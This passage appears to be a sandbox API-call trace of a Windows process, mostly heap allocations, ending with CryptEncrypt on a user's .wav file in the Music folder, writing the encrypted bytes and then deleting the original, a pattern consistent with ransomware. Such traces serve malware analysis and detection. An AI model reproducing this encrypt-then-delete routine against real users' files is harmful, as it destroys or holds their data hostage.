lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0205.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0205.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0205.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0205.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0205.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0205.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaae88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0205.876] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xce48, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xce50) returned 1 [0205.876] CharLowerBuffW (in: lpsz="byte[52816]", cchLength=0xb | out: lpsz="byte[52816]") returned 0xb [0205.878] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.878] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaadc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0205.880] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xce48, dwBufLen=0xce50 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xce50) returned 1 [0205.882] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.882] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.882] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.882] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.883] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.883] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.895] WriteFile (in: hFile=0x50c, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xce50, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xce50, lpOverlapped=0x0) returned 1 [0205.896] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0205.896] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0205.903] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.903] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0205.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaca8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0205.903] CryptDestroyKey (hKey=0x9e1eb8) returned 1 [0205.903] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.903] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.903] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.903] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.903] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.903] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.903] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0205.903] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0205.903] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0205.904] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0205.904] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.904] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.904] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.904] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.904] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.904] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0205.904] CryptReleaseContext (hProv=0xa7c660, dwFlags=0x0) returned 1 [0205.904] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.904] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.904] FreeLibrary (hLibModule=0x76390000) returned 1 [0205.904] CloseHandle (hObject=0x4ac) returned 1 [0205.906] CloseHandle (hObject=0x50c) returned 1 [0205.910] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.910] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.910] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav", lpFilePart=0x8cedf4*="E6IDgLQGE97MYwh0a.wav") returned 0x2b [0205.911] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav" (normalized: "c:\\users\\fd1hvy\\music\\e6idglqge97mywh0a.wav")) returned 0x20 [0205.911] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf53dd50, ftCreationTime.dwHighDateTime=0x1d5c9ae, ftLastAccessTime.dwLowDateTime=0x62440750, ftLastAccessTime.dwHighDateTime=0x1d5cd9e, ftLastWriteTime.dwLowDateTime=0x62440750, ftLastWriteTime.dwHighDateTime=0x1d5cd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce48, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="E6IDgLQGE97MYwh0a.wav", cAlternateFileName="E6IDGL~1.WAV")) returned 0x9e2238 [0205.911] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav" (normalized: "c:\\users\\fd1hvy\\music\\e6idglqge97mywh0a.wav")) returned 1 [0205.913] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf53dd50, ftCreationTime.dwHighDateTime=0x1d5c9ae, ftLastAccessTime.dwLowDateTime=0x62440750, ftLastAccessTime.dwHighDateTime=0x1d5cd9e, ftLastWriteTime.dwLowDateTime=0x62440750, ftLastWriteTime.dwHighDateTime=0x1d5cd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce48, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="E6IDgLQGE97MYwh0a.wav", cAlternateFileName="E6IDGL~1.WAV")) returned 0 [0205.913] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0205.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ab8 | out: hHeap=0x2af0000) returned 1 [0205.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.914] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0205.914] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0205.914] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0205.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0205.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0205.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74980 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0205.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0205.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5f720 [0205.916] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav", lpFilePart=0x8cf650*="E6IDgLQGE97MYwh0a.wav") returned 0x2b [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f720 | out: hHeap=0x2af0000) returned 1 [0205.916] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav" (normalized: "c:\\users\\fd1hvy\\music\\e6idglqge97mywh0a.wav")) returned 0xffffffff [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74980 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0205.916] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 